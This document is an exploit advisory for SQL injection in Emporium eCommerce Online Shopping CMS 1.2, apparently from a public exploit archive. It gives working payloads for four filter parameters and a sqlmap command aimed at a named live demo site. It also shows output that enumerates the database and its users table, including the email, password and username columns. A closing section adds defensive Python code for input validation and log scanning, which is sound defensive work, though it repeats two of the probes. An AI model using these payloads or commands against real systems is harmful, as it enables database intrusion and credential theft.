Emporium eCommerce Online Shopping CMS 1.2 SQL Injection
Emporium eCommerce Online Shopping CMS version 1.2 suffers from a remote SQL injection vulnerability.
Author   : CraCkEr
Website  : mybizcms.com
Vendor   : mybizcms
Software : Emporium eCommerce - Online Shopping CMS v1.2
Vuln Type: Remote SQL Injection
Method   : GET
Critical : High
Impact   : Database Access

Emporium eCommerce is a complete online shopping platform for all your needs.

B4nks-NET irc.b4nks.tk #unix

Release Notes:
Typically used for remotely exploitable vulnerabilities that can lead to system compromise.

Greets: Phr33k, NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk loool, DevS, Dark-Gost
CryptoJob (Twitter) twitter.com/CryptozJob

© CraCkEr 2022

There are 4 parameters vulnerable to SQL Injection in /categories/other-categories?

GET parameter 'min_price' is vulnerable
---
Parameter: min_price (GET)
    Type: error-based
    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
    Payload: min_price=(UPDATEXML(5880,CONCAT(0x2e,0x7176787a71,(SELECT (ELT(5880=5880,1))),0x716b707071),2936))&max_price=145000&storage[]=41

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: min_price=(SELECT 3031 FROM (SELECT(SLEEP(5)))qWqF)&max_price=145000&storage[]=41
---

GET parameter 'percentage' is vulnerable
---
Parameter: percentage (GET)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - Parameter replace (MAKE_SET)
    Payload: percentage=MAKE_SET(4728=4728,5649)

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: percentage=40 AND (SELECT 8890 FROM(SELECT COUNT(*),CONCAT(0x7170706b71,(SELECT (ELT(8890=8890,1))),0x717a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: percentage=40 AND (SELECT 9724 FROM (SELECT(SLEEP(5)))chdS)
---

GET parameter 'review_ratings' is vulnerable
---
Parameter: review_ratings (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: review_ratings=4 AND (SELECT 5450 FROM(SELECT COUNT(*),CONCAT(0x7170706b71,(SELECT (ELT(5450=5450,1))),0x717a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: review_ratings=4 AND (SELECT 2340 FROM (SELECT(SLEEP(5)))lpXn)
---

GET parameter 'brand[]' is vulnerable
---
Parameter: brand[] (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: brand[]=15') AND 3512=3512 AND ('Othl'='Othl

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: brand[]=15');SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: brand[]=15') AND (SELECT 9038 FROM (SELECT(SLEEP(5)))hyaE) AND ('KJgc'='KJgc
---

Live Demo Site: https://mybizcms.com/demos/multivendor/

[+] Starting the Attack

sqlmap.py -u "https://mybizcms.com/demos/multivendor/categories/other-categories?brand%5B%5D=15" --current-db --batch --random-agent

[INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 7.3.33, PHP
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[INFO] fetching current database
current database: 'mybizcms_multivendor'
fetching tables for database: 'mybizcms_multivendor'
[101 tables]
fetching columns for table 'users' in database 'mybizcms_multivendor'
Table: users
[34 columns]
fetching entries of column(s) 'email,password,username' for table 'users' in database 'mybizcms_multivendor'
Database: mybizcms_multivendor
Table: users
[7 entries]
[-] Done
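A defender-side example, added here and not part of the original advisory or of the Emporium code base: strict type checks for the filter parameters the advisory names on /categories/other-categories (prices as non-negative decimals with at most two fraction digits, percentage 0-100, review_ratings 1-5, brand[] and storage[] as lists of positive integer ids), run over constructed access-log lines. The accepted ranges and the log lines are assumptions; every probe listed above fails the check, so the same rule works as an input guard in the application and as a log-scan detection.

```python
from decimal import Decimal, InvalidOperation
from urllib.parse import parse_qs, urlsplit

# Expected shape of each filter parameter named in the advisory. The ranges are
# assumptions about what the shop should accept, not taken from the Emporium source.
def _money(v):
    try:
        d = Decimal(v)
        return d >= 0 and d == d.quantize(Decimal("0.01"))
    except InvalidOperation:
        return False

def _int_in(lo, hi):
    return lambda v: v.isdigit() and lo <= int(v) <= hi

RULES = {
    "min_price": _money,
    "max_price": _money,
    "percentage": _int_in(0, 100),
    "review_ratings": _int_in(1, 5),
    "brand[]": _int_in(1, 10**9),    # array of integer brand ids
    "storage[]": _int_in(1, 10**9),
}

def violations(url):
    """Names of query parameters that fail strict typing (unknown names included)."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    bad = []
    for name, values in qs.items():
        check = RULES.get(name, lambda v: False)   # unknown filter names are rejected too
        if not all(check(v) for v in values):
            bad.append(name)
    return sorted(bad)

# Constructed access-log lines: one benign filter request, then two of the
# advisory's probes, URL-encoded as a browser or sqlmap would send them.
LOG = """\
10.0.0.5 - - [01/Jan/2022:10:00:00 +0000] "GET /categories/other-categories?min_price=100&max_price=145000&storage[]=41 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2022:10:00:01 +0000] "GET /categories/other-categories?min_price=(SELECT%203031%20FROM%20(SELECT(SLEEP(5)))qWqF)&max_price=145000&storage[]=41 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2022:10:00:02 +0000] "GET /categories/other-categories?brand%5B%5D=15%27)%20AND%203512%3D3512%20AND%20(%27Othl%27%3D%27Othl HTTP/1.1" 200 512
"""

def flagged_requests(log=LOG):
    hits = {}   # request-target -> parameters that failed the type check
    for line in log.splitlines():
        target = line.split('"')[1].split(" ")[1]   # request-target of the GET line
        bad = violations(target)
        if bad:
            hits[target] = bad
    return hits
```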